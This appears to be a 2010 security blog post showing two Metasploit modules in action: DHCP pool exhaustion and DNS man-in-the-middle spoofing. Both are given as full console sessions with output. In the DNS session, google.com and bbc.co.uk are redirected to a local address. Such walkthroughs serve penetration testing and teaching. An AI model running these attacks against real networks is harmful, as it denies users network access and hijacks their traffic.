Ethical | RootAdmin.co.uk

Tag: ethical

DHCP Exhaustion and DNS MiTM

by Rootadmin on Mar.14, 2010, under Uncategorized

DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning that no there are no available address’s from DHCP and a computer set to get a DHCP address cant get on the network – a very nice idea for a Denial of Service Attack in my oppinion.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion


msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM


msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry


192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk


nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file


echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again


> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

Leave a Comment :admin, application, attack, development, dhcp, digininja, DNS, ethical, exhaustion, fake, freedom, hack, hacking, jasager, karma, liam, Liam Somerville, madwifi, mitm, network, ninja, open source, penetration, projects, root, rootadmin, rootadmin.co.uk, security, site, software, somerville, testing, web, website, wifi more...

Howdy. Welcome to RootAdmin.co.uk!
Thanks for dropping by! Feel free to stay updated by subscribing to the RSS feed. See ya around!
Recent Posts
Categories
- Cisco (9)
- Life's Questions (16)
- Linux (2)
- Linux tutorial (1)
- Microsoft (4)
- Office (1)
- Other (31)
- TANDEM/HP NonStop (1)
- Uncategorized (11)
- Windows (5)
Links

Categories
- Cisco
- Life's Questions
- Linux
  - Linux tutorial
- Microsoft
  - Office
  - Windows
- Other
- TANDEM/HP NonStop
- Uncategorized

RootAdmin.co.uk

Tag: ethical

DHCP Exhaustion and DNS MiTM

DHCP Exhaustion

DNS MiTM

Howdy. Welcome to RootAdmin.co.uk!

Recent Posts

Categories

Links

Categories

Looking for something?

Links!

Archives